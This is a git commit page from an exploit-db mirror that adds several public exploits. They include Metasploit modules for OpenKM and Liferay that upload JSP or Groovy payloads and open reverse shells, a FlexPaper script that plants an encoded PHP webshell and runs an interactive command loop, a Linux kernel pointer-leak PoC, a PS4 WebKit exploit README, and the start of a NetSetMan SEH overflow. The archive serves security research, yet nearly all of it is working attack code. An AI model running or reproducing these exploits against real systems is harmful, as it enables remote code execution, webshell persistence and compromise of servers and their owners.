bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-03-12

Browse source 
10 changes to exploits/shellcodes

Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak
Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)
NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)
OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)
PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution

Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)
Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)
This commit is contained in:
Offensive Security 2019-03-12 05:01:58 +00:00
parent 790ba4b35e
commit ce1901fc4f
12 changed files with 1219 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

73
exploits/hardware/local/46522.md Normal file
View file

@ -0,0 +1,73 @@
PS4 6.20 WebKit Code Execution PoC
==============
This repo contains a proof-of-concept (PoC) RCE exploit targeting the PlayStation 4 on firmware 6.20 leveraging CVE-2018-4441. The exploit first establishes an arbitrary read/write primitive as well as an arbitrary object address leak in `wkexploit.js`. It will then setup a framework to run ROP chains in `index.html` and by default will provide two hyperlinks to run test ROP chains - one for running the `sys_getpid()` syscall, and the other for running the `sys_getuid()` syscall to get the PID and user ID of the process respectively.
Each file contains a comment at the top giving a brief explanation of what the file contains and how the exploit works. Credit for the bug discovery is to lokihardt from Google Project Zero (p0). The bug report can be found [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=1685&desc=2).
Note: It's been patched in the 6.50 firmware update.
Files
==============
Files in order by name alphabetically;
* `index.html` - Contains post-exploit code, going from arb. R/W -> code execution.
* `rop.js` - Contains a framework for ROP chains.
* `syscalls.js` - Contains an (incomplete) list of system calls to use for post-exploit stuff.
* `wkexploit.js` - Contains the heart of the WebKit exploit.
Notes
==============
* This vulnerability was patched in 6.50 firmware!
* This only gives you code execution in **userland**. This is **not** a jailbreak nor a kernel exploit, it is only the first half.
* This exploit targets firmware 6.20. It should work on lower firmwares however the gadgets will need to be ported, and the `p.launchchain()` method for code execution may need to be swapped out.
* In my tests the exploit as-is is pretty stable, but it can become less stable if you add a lot of objects and such into the exploit. This is part of the reason why `syscalls.js` contains only a small number of system calls.
Usage
==============
Setup a web-server hosting these files on localhost using xampp or any other program of your choosing. Additionally, you could host it on a server. You can access it on the PS4 by either;
1) Fake DNS spoofing to redirect the manual page to the exploit page, or
2) Using the web browser to navigate to the exploit page (not always possible).
Vulnerability Credit
==============
I wrote the exploit however I did not find the vulnerability, as mentioned above the bug (CVE-2018-4441) was found by lokihardt from Google Project Zero (p0) and was disclosed via the Chromium public bug tracker.
Resources
==============
[Chromium Bug Report](https://bugs.chromium.org/p/project-zero/issues/detail?id=1685&desc=2) - The vulnerability.
[Phrack: Attacking JavaScript Engines by saelo](http://www.phrack.org/papers/attacking_javascript_engines.html) - A life saver. Exploiting this would have been about 1500x more difficult without this divine paper.
Thanks
==============
lokihardt - The vulnerability
st4rk - Help with the exploit
qwertyoruiop - WebKit School
saelo - Phrack paper
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46522.zip

282
exploits/jsp/webapps/46526.rb Executable file
View file

@ -0,0 +1,282 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenKM Document Management < 6.3.7 - (Authenticated) Remote Command Execution',
'Description' => %q{
Versions of the OpenKM Document Management < 6.3.7 allows upload a malicious
JSP file into the "/okm:root" directories and move that file to the home directory of the site.
This vulnerability is carried out by interfering to the "Filesystem path" control in the admin's "Export" field.
As a result, attackers can gain remote code execution through the application server with root privilege.
This module allows the execution of remote commands on the server by creating a malicious JSP file.
Module has been tested successfully with OpenKM DM between 6.3.2 and 6.3.7 on Debian 4.9.18-1kali1 system.
There is also the possibility of working in lower versions.
},
'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' ], # Vulnerability Discovery, PoC & Msf Module
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/OpenKM-DM-6-3-7-Remote-Command-Execution-Metasploit.html']
],
'DisclosureDate' => "March 09 2019",
'License' => MSF_LICENSE,
'Platform' => %w{ linux win },
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
],
[ 'Java Windows',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
}
],
[ 'Java Linux',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' }))
register_options(
[
Opt::RPORT(8080),
OptBool.new('SSL', [true, 'Use SSL', false]),
OptString.new('TARGETURI', [true, 'The base path to OpenKM', '/']),
OptString.new('USERNAME', [true, 'User to login with', 'okmAdmin']),
OptString.new('PASSWORD', [true, 'Password to login with', 'admin']),
], self.class)
end
##
# Request to Login
##
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/OpenKM/j_spring_security_check"),
'vars_post' => {
"j_username" => datastore['USERNAME'],
"j_password" => datastore['PASSWORD'],
"submit" => "Login"
}
})
if res and res.code == 302 and res.headers['Location'] =~ /error/
fail_with(Failure::NoAccess, "Failed to login!")
else
print_good("Login successful.")
end
return res
end
##
# Returns the SSL, Host and Port as a string
##
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
##
# Vulnerablity Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/home.jsp"),
'headers' =>
{
'Cookie' => login.get_cookies,
}
})
version = res.body.split('Version: ')[1].split('</td>')[0]
print_status("Version: #{version}")
if res and res.code == 200 and res.body =~ /Version: 6./ or res.body =~ /Version: 5./
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
def exploit
get_cookie = login.get_cookies
cookie = get_cookie
print_status("Cookie: #{cookie}")
##
# Read to X-GWT-Permutation string
##
print_status("Attempting to read X-GWT-Permutation...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/frontend.nocache.js"),
'headers' =>
{
'Cookie' => cookie,
}
})
cache = res.body.split('Wb=')[1].split("'")[1]
print_good("X-GWT-Permutation: #{cache}")
##
# Create directory for payload
##
print_status("Attempting to create directory for payload...")
dfile = "#{rand_text_alphanumeric(rand(5) + 5)}akkus"
string = Rex::Text.rand_text_alphanumeric(10)
data = "7|0|7|#{peer}/OpenKM/frontend/|"
data << "#{cache}"
data << "|com.openkm.frontend.client.service.OKMFolderService|create|java.lang.String/"
data << "#{string}"
data << "|#{dfile}|/okm:root|1|2|3|4|2|5|5|6|7|"
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/Folder"),
'headers' =>
{
'Content-Type' => 'text/x-gwt-rpc; charset=utf-8',
'X-GWT-Permutation' => cache,
'X-GWT-Module-Base' => '#{peer}/OpenKM/frontend/',
'Referer' => '#{peer}/OpenKM/frontend/index.jsp',
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus/
print_good("#{dfile} directory successfully created!")
else
print_error("Directory could not be created!")
return res
end
##
# Upload JSP payload
##
pfile = "#{rand_text_alphanumeric(rand(5) + 5)}akkus.jsp"
boundary = Rex::Text.rand_text_alphanumeric(29)
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n/okm:root/#{dfile}\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n0\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"rename\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"comment\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"mails\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"users\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"roles\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"message\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"increaseVersion\"\r\n\r\n0\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"uploadFormElement\"; filename=\"#{pfile}\""
data << "\r\nContent-Type: application/octet-stream\r\n\r\n"
data << payload.encoded
data << "\n\r\n-----------------------------{boundary}--\r\n"
print_status("Attempting to upload JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/FileUpload"),
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => '#{peer}/OpenKM/frontend/index.jsp',
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus.jsp/
print_good("#{pfile} payload uploaded successfully!")
else
print_error("JSP Payload upload failed!")
end
##
# Read Tomcat web directory path
##
print_status("Attempting to read Tomcat web directory path...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/system_properties.jsp"),
'headers' =>
{
'Cookie' => cookie,
}
})
dir = res.body.split('catalina.base')[1].split('<td>')[1].split(' ')[0]
path = "#{dir}/webapps/OpenKM"
print_good("Web directory path => #{path}")
##
# Move the payload file to the site's home directory
##
print_status("Attempting to move payload file to the site's home directory...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/repository_export.jsp?repoPath=%2Fokm%3Aroot%2F#{dfile}&fsPath=" + URI.encode(path, /\W/)),
'headers' =>
{
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus/
print_good("JSP Payload was moved successfully!")
print_status("=> #{path}/#{pfile} ")
else
print_error("JSP Payload upload failed!")
end
##
# Execute the Payload
##
print_status("Attempting to execute the #{pfile} payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/#{pfile}"),
'headers' =>
{
'Cookie' => cookie,
}
})
if res and res.code == 200
print_good("Payload executed successfully!")
else
fail_with(Failure::PayloadFailed, "Failed to execute the payload!")
end
end
end
##
# End
##

137
exploits/linux/dos/46529.c Normal file
View file

@ -0,0 +1,137 @@
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sound/asound.h>
# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback()
# Google Dork: -
# Date: 2019-03-11
# Exploit Author: wally0813
# Vendor Homepage: -
# Software Link: -
# Version: Linux Kernel 4.4 (Ubuntu 16.04)
# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# CVE: CVE-2016-4578
# Category: Local
/*
* [ Briefs ]
* - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read()
* - This is local exploit against the CVE-2016-4578.
*
* [ Tested version ]
* - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
*
* [ Prerequisites ]
* -
*
* [ Goal ]
* - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback()
*
* [ Run exploit ]
* - $ gcc -o poc poc.c
* - $ sudo ./poc
* leak_value(event) : ffff8800
* leak_value(val) : ffffffff
*
* [ Contact ]
* - soyeoni0813@gmail.com
*/
int fd;
void leak(){
struct snd_timer_tread td;
struct snd_timer_select st;
struct snd_timer_params ps;
int r;
unsigned int leak_value_e, leak_value_v;
int tread;
memset(&td,0,sizeof(td));
memset(&st,0,sizeof(st));
memset(&ps,0,sizeof(ps));
// set tread
tread = 1;
ps.filter |= 1<<SNDRV_TIMER_EVENT_START;
ps.ticks = 1000 * 1000;
r = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread);
if (r) {
printf("SNDRV_TIMER_IOCTL_TREAD error : %d, %s\n", errno, strerror(errno));
return;
}
// vuln trigger
st.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL;
st.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION;
r = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st);
if (r) {
printf("SNDRV_TIMER_IOCTL_SELECT error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps);
if (r) {
printf("SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_START);
if (r) {
printf("SNDRV_TIMER_IOCTL_START error : %d, %s\n", errno, strerror(errno));
return;
}
// get leak
r = read(fd, &td, sizeof(td));
leak_value_e = *((unsigned long *)(&td.event+1));
printf("leak_value(event) : %lx\n", leak_value_e);
leak_value_v = *((unsigned long *)(&td.val+1));
printf("leak_value(val) : %lx\n", leak_value_v);
}
int main(int argc, char **argv)
{
fd = open("/dev/snd/timer", O_RDWR);
if (fd < 0) {
printf("open error : %d, %s\n", errno, strerror(errno));
return -1;
}
leak();
close(fd);
return 0;
}

266
exploits/multiple/webapps/46525.rb Executable file
View file

@ -0,0 +1,266 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Liferay CE Portal Tomcat < 7.1.2 ga3 - Groovy-Console Remote Command Execution',
'Description' => %q{
This module uses the Liferay CE Portal Groovy script console to execute
OS commands. The Groovy script can execute commands on the system via a [command].execute() call.
Valid credentials for an application administrator user account are required
This module has been tested successfully with Liferay CE Portal Tomcat 7.1.2 ga3 on Debian 4.9.18-1kali1 system.
},
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://pentest.com.tr/exploits/Liferay-CE-Portal-Tomcat-7-1-2-ga3-Groovy-Console-Remote-Command-Execution-Metasploit.html' ],
],
'Privileged' => false,
'Platform' => [ 'unix' ],
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'reverse perl ruby python',
}
},
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Liferay CE Portal Tomcat < 7.1.2 ga3', { }]
],
'DisclosureDate' => 'March 08, 2019',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username', ]),
OptString.new('PATH', [ true, 'The URI path of the portal', '/' ]),
], self.class)
end
##
# Version and Vulnerability Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
version = res.headers['Liferay-Portal']
print_status("Target: #{version}")
if res and res.code == 200 and version =~ /Portal 7./ or version =~ /Portal 6./
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Returns the SSL, Host and Port as a string
##
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def exploit
##
# Login and cookie information gathering
##
print_status('Attempting to login with specified user...')
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
authtoken = res.body.split('Liferay.authToken=')[1].split(';')[0].split('Liferay.authToken=')[0].split('"')[1]
print_status("Liferay AuthToken = #{authtoken}")
sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
cookie = "#{sessionid}; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US"
print_status("#{sessionid}")
boundary = Rex::Text.rand_text_alphanumeric(29)
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_formDate\"\r\n\r\n"
data << ""
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_saveLastPath\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_redirect\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_login\"\r\n\r\n"
data << "#{datastore['USERNAME']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_password\"\r\n\r\n"
data << "#{datastore['PASSWORD']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_checkboxNames\"\r\n\r\nrememberMe\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
data << "#{authtoken}"
data << "\r\n-----------------------------{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + 'web/guest/home?p_p_id=com_liferay_login_web_portlet_LoginPortlet&p_p_lifecycle=1&p_p_state=exclusive&p_p_mode=view&_com_liferay_login_web_portlet_LoginPortlet_javax.portlet.action=%2Flogin%2Flogin&_com_liferay_login_web_portlet_LoginPortlet_mvcRenderCommandName=%2Flogin%2Flogin',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
},
'cookie' => cookie
})
if res.code == 302
print_good('User authentication was successful.')
else
print_error('Something went wrong! Login failed.')
end
cookie1 = ''
for cookie1_i in [ 'JSESSIONID=', 'COMPANY_ID=', 'ID=' ]
cookie1 << cookie1_i + res.headers['set-cookie'].split(cookie1_i)[1].split('; ')[0] + '; '
end
cookies0 = "#{cookie1} COOKIE_SUPPORT=true;"
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'c',
'cookie' => cookies0
})
##
# Completion of the cookie information
##
cookie2 = ''
for cookie2_i in [ 'GUEST_LANGUAGE_ID=', 'Max-Age=', 'Expires=', 'Path=' ]
cookie2 << cookie2_i + res.headers['set-cookie'].split(cookie2_i)[1].split('; ')[0] + '; '
end
cookies = "#{cookie1} #{cookie2} COOKIE_SUPPORT=true;"
if cookies =~ /ID=/
print_good("Cookies information has been verified.")
else
print_error("Cookies information could not be verified!")
exit 0
end
##
# Request to Groovy script authtoken
##
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
'headers' =>
{
'Referer' => '#{peer}/group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
},
'cookie' => cookies
})
##
# Calling authtoken to Groovy script
##
authtoken2 = res.body.split('Liferay.authToken=')[1].split(';')[0].split('Liferay.authToken=')[0].split('"')[1]
print_status("Liferay AuthToken to Shell = #{authtoken2}")
##
# Payload Separation **cmd/unix/reverse|reverse_ruby|reverse_python|reverse_perl**
##
if payload.encoded =~ /sh/
cmd = payload.encoded.split('sh -c')[1].split("'")[1]
pay = "'sh', '-c', '#{cmd}'"
print_good("Reverse payload was prepared")
elsif payload.encoded =~ /perl/
cmd = payload.encoded.split('perl -MIO -e')[1].split("'")[1]
pay = "'perl', '-MIO', '-e', '#{cmd}'"
print_good("Reverse Perl payload was prepared")
elsif payload.encoded =~ /python/
cmd = payload.encoded.split('python -c "exec(')[1].split(".decode('base64'))\"")[0].split("'")[1]
pay = "'python', '-c', 'exec(\"#{cmd}\".decode(\"base64\"))'"
print_good("Reverse Python payload was prepared")
elsif payload.encoded =~ /ruby/
cmd = payload.encoded.split('ruby -rsocket -e ')[1].split("'")[1]
pay = "'ruby', '-rsocket', '-e', '#{cmd}'"
print_good("Reverse Ruby payload was prepared")
else
print_error("! Please choose payload one of cmd/unix/reverse|reverse_ruby|reverse_python|reverse_perl ")
exit 0
end
##
# Post Data to run Payload
##
cmdata = "-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_formDate\"\r\n\r\n"
cmdata << ""
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1\"\r\n\r\n"
cmdata << "script\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_redirect\"\r\n\r\n"
cmdata << "#{peer}/group/control_panel/manage?p_p_id="
cmdata << "com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle="
cmdata << "0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_"
cmdata << "ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_"
cmdata << "server_admin_web_portlet_ServerAdminPortlet_cur=""0&_com_liferay_server_"
cmdata << "admin_web_portlet_ServerAdminPortlet_tabs1=script"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_language\"\r\n\r\n"
cmdata << "groovy"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_script\"\r\n\r\n"
cmdata << "def cmd = [#{pay}]"
cmdata << "\r\ncmd.execute()"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_cmd\"\r\n\r\n"
cmdata << "runScript"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
cmdata << "#{authtoken2}"
cmdata << "\r\n-----------------------------{boundary}--\r\n"
##
# Request to get reverse shell
##
print_status("Attempting to execute the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + 'group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_javax.portlet.action=%2Fserver_admin%2Fedit_server',
'data' => cmdata,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => '#{peer}/group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
},
'cookie' => cookies
})
if res.code == 302
print_good('Payload was successfully executed.')
else
print_error('Something went wrong!')
end
end
end
##
# End
##

70
exploits/php/webapps/46528.py Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/env python
#Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE
#Date: March 2019
#Exploit Author: Red Timmy Security - redtimmysec.wordpress.com
#Vendor Homepage: https://flowpaper.com/download/
#Version: <= 2.3.6
#Tested on: Linux/Unix
#CVE : CVE-2018-11686
#Disclamer: This exploit is for educational purpose only
#More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/
import sys
import requests
import readline
import urllib2
import ssl
try:
url = sys.argv[1]
except:
print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"
print sys.exit(1)
print """
__ __
_____/ /_ ________ ____/ ____ ____ _____ ___ _____
/ ___/ __ \/ ___/ _ \/ __ / __ \/ __ `/ __ \/ _ \/ ___/
(__ / / / / / / __/ /_/ / /_/ / /_/ / /_/ / __/ /
/____/_/ /_/_/ \___/\__,_/ .___/\__,_/ .___/\___/_/
/_/ /_/
"""
print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"
print "[*] Attacking %s" %url
print "[*] Deleting target configuration file"
payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))
url1 = url+"/php/change_config.php"
r1 = requests.post(url1, data=payload)
rx = requests.post(url1, data=payload) #resend
shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"
print "[*] Uploading webshell.."
url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode
r2 = requests.get(url2)
print "[*] Checking if shell is uploaded successfully"
webshell = url+ '/php/tiger_shell.php'
check_shell = requests.get(webshell)
if check_shell.status_code == 200:
print "[*] We got a shell"
else:
print "[-] Exploit failed, die"
sys.exit(2)
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
while True:
cmd = raw_input("enter cmd>>")
cmd = cmd.strip()
cmd = cmd.encode('base64').strip().replace("\n","")
link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
#print link
try:
response = urllib2.urlopen(link, context=ctx)
page = response.read()
print page
except Exception as exc:
print exc
continue

2
exploits/windows/local/45496.c
View file

@ -107,7 +107,7 @@ int AddAccountToAdminGroup(HANDLE hTokenElevated)
printf("\n[*] Creating new process...");
// The command or binary file to be executed can be changed here
sprintf(netcommand, "powershell.exe .\\rev.ps1");
sprintf(netcommand, "calc.exe");
if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{

109
exploits/windows/local/46530.py Executable file
View file

@ -0,0 +1,109 @@
#Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows XP SP3
#-------------------------------------------------------------------------------
#Steps to replicate:
#1. Run the Python code below which outputs two payload .txt files.
#2. Open NetSetMan
#3. Enable "Workgroup" for both the "[Double Click!]" tab and "SET1" tab
#4. Paste contents of "payload2.txt" into the "Workgroup" field in the "SET1" tab.
#5. Paste contents of "payload1.txt" into the "Workgroup" field in the "[Double Click!]" tab.
#6. Click "Activate"
#7. ...
#8. Profit
#This is a unicode SEH overflow, but the buffer is too small for a unicode encoded reverse shell payload.
#Therefore, an egghunter is implemented to locate an alphanumeric encoded payload stored in memory.
#-------------------------------------------------------------------------------
# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -e x86/alpha_mixed -f python
#-v shellcode EXITFUNC=seh BufferRegister=EDI
#Payload size: 440 bytes
shellcode = ""
shellcode = "w00tw00t"
